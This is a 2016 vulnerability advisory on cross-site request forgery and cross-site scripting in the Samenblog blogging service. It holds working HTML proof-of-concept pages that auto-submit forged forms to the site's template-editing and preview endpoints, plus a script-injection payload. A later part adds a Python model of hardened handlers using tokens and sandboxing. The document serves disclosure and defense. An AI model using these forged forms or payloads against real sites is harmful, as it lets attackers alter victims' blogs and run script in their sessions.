Document Title:
===============
SamenBlog Weblog Service - Cross Site Request Forgery / Cross Site Scripting


References (Source):
====================
http://ehsansec.ir/advisories/samenblog-xsrf-xss.txt


Release Date:
=============
2016-02-20


Product & Service Introduction:
===============================
Samenblog lets its users publish information, memories, essays and
similar content through a professional weblog-publishing system in a
simple environment, and aims to serve both professional and amateur
users.


Vulnerability Type:
===================
Cross Site Request Forgery
Cross Site Scripting

Vulnerability Details:
======================
I discovered a client-side cross site request forgery web
vulnerability and a cross site scripting vulnerability in
Samenblog.com (Weblog Service).


Author:
=======
Ehsan Hosseini
http://ehsansec.ir/


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium




Proof of Concept (PoC):
=======================
-- Cross Site Request Forgery --
-- PoC : Edit Themes --

-- PoC 1 --

<html>
<head>
	<title>Edit Weblog Template - Csrf</title>
</head>
<!-- the hidden form is submitted automatically when the page loads -->
<body onload="document.info.submit()">
	<form action='http://samenblog.com/cpanel/edit_template.php'
method='POST' name='info'>
		<input type="hidden" name="template" value="<h1> PoC </h1>">
		<input type='hidden' name='task' value='doedit'>
	</form>
</body>
</html>

-- PoC 2 --

<html>
<head>
	<title>Edit The extra pages templates - Csrf</title>
</head>
<!-- onload must reference the form by its own name ('infoo') -->
<body onload="document.infoo.submit()">
	<form action='http://samenblog.com/cpanel/edit_template.php'
method='POST' name='infoo'>
		<input name='templatepage' value="<h1> PoC </h1>">
		<input type='hidden' name='task' value='doeditpage'>
	</form>
</body>
</html>

-- PoC 3 --

<html>
<head>
	<title>Edit The archive templates - Csrf</title>
</head>
<!-- onload must reference the form by its own name ('infooo') -->
<body onload="document.infooo.submit()">
	<form action='http://samenblog.com/cpanel/edit_template.php'
method='POST' name='infooo'>
		<input name='templatearchive' value="<h1> PoC </h1>">
		<input type='hidden' name='task' value='doeditarchive'>
	</form>
</body>
</html>

-- Cross Site Scripting --

<html>
<head>
	<title>Cross Site Scripting</title>
</head>
<!-- onload must reference the form by its own name ('preview') -->
<body onload="document.preview.submit()">
	<form action='http://samenblog.com/cpanel/preview.php' method='POST'
name='preview'>
		<input name='templatearchive' value="<script>alert('Ehsan')</script>">
	</form>
</body>
</html>
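Both issues have the same root cause: the cpanel endpoints trust the session cookie alone, so any page that auto-submits a form to them acts as the logged-in user, and preview.php then reflects the submitted template into the cpanel origin. The following Python model is an added example, not Samenblog's code (its endpoints are PHP and are not shown here). It places the unprotected behaviour the PoCs rely on next to a hardened version that requires a per-session synchronizer token plus a same-site Origin/Referer, and serves the preview under a CSP sandbox. The task values and field names (doedit, doeditpage, doeditarchive, template, templatepage, templatearchive) come from the PoCs; the csrf_token field, the session/headers dicts, the helper names and the attacker origin are assumptions for this illustration.

```python
# Added example (not Samenblog's code): framework-free model of the cpanel
# endpoints named in the advisory, unprotected and hardened side by side.
import hmac
import secrets
from urllib.parse import urlparse

SITE_ORIGIN = "http://samenblog.com"      # origin from the PoC URLs
CSRF_FIELD = "csrf_token"                 # assumed hidden-field name
TASK_FIELDS = {                           # task value -> field holding the template
    "doedit": "template",
    "doeditpage": "templatepage",
    "doeditarchive": "templatearchive",
}


def issue_csrf_token(session):
    """One random synchronizer token per session; the cpanel's own edit and
    preview forms embed it as a hidden field."""
    if CSRF_FIELD not in session:
        session[CSRF_FIELD] = secrets.token_urlsafe(32)
    return session[CSRF_FIELD]


def verify_csrf(session, headers, form):
    """Accept a POST only if (1) any Origin/Referer present is same-site and
    (2) the form carries the session's token (constant-time comparison)."""
    source = headers.get("Origin") or headers.get("Referer")
    if source is not None:
        p = urlparse(source)
        if f"{p.scheme}://{p.netloc}" != SITE_ORIGIN:
            return False
    expected = session.get(CSRF_FIELD, "")
    supplied = form.get(CSRF_FIELD, "")
    return bool(expected) and hmac.compare_digest(expected.encode(), supplied.encode())


def edit_template_vulnerable(store, form):
    """Models edit_template.php as the PoCs find it: the cookie alone
    authorises the change, so a forged cross-site form is saved."""
    field = TASK_FIELDS.get(form.get("task", ""))
    if field is None or field not in form:
        return 400, "unknown task"
    store[field] = form[field]
    return 200, "saved"


def edit_template_hardened(store, session, headers, form):
    """Same handler behind the CSRF check."""
    if not verify_csrf(session, headers, form):
        return 403, "cross-site request rejected"
    return edit_template_vulnerable(store, form)


def preview_vulnerable(form):
    """Models preview.php: reflects the template verbatim on the cpanel
    origin, which is what the XSS PoC exploits."""
    return 200, {"Content-Type": "text/html"}, form.get("templatearchive", "")


def preview_hardened(session, headers, form):
    """A template preview has to render the user's own HTML, so escaping is
    not an option. Instead: no cross-site trigger (token required) and the
    preview document gets an opaque origin via CSP sandbox, so any script in
    it runs without the cpanel's cookies or DOM."""
    if not verify_csrf(session, headers, form):
        return 403, {}, "cross-site request rejected"
    status, hdrs, body = preview_vulnerable(form)
    hdrs = dict(hdrs, **{"Content-Security-Policy": "sandbox allow-scripts"})
    return status, hdrs, body


def simulate_csrf_poc():
    """Replays PoC 1 against both handlers. The browser attaches the victim's
    session, but the forged form carries no token and an off-site Origin
    (constructed value); a legitimate same-site submission still succeeds."""
    session = {}
    issue_csrf_token(session)
    forged_headers = {"Origin": "http://attacker.example"}   # constructed
    forged_form = {"template": "<h1> PoC </h1>", "task": "doedit"}
    store_v, store_h = {}, {}
    vuln = edit_template_vulnerable(store_v, forged_form)[0]
    hard = edit_template_hardened(store_h, session, forged_headers, forged_form)[0]
    good_form = {"template": "<p>legit</p>", "task": "doedit",
                 CSRF_FIELD: session[CSRF_FIELD]}
    legit = edit_template_hardened(store_h, session, {"Origin": SITE_ORIGIN}, good_form)[0]
    return vuln, hard, legit, store_v.get("template"), store_h.get("template")


if __name__ == "__main__":
    print(simulate_csrf_poc())   # (200, 403, 200, '<h1> PoC </h1>', '<p>legit</p>')
```

The Origin/Referer check alone is not enough (some clients omit both headers, and an absent header falls through to the token check here), which is why the token is mandatory on every state-changing request, including the preview. On the detection side, a POST to /cpanel/edit_template.php or /cpanel/preview.php whose Referer is off-site, or which lacks the token field, is the signal to log.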


Contact:
========
hehsan979@gmail.com
info@ehsansec.ir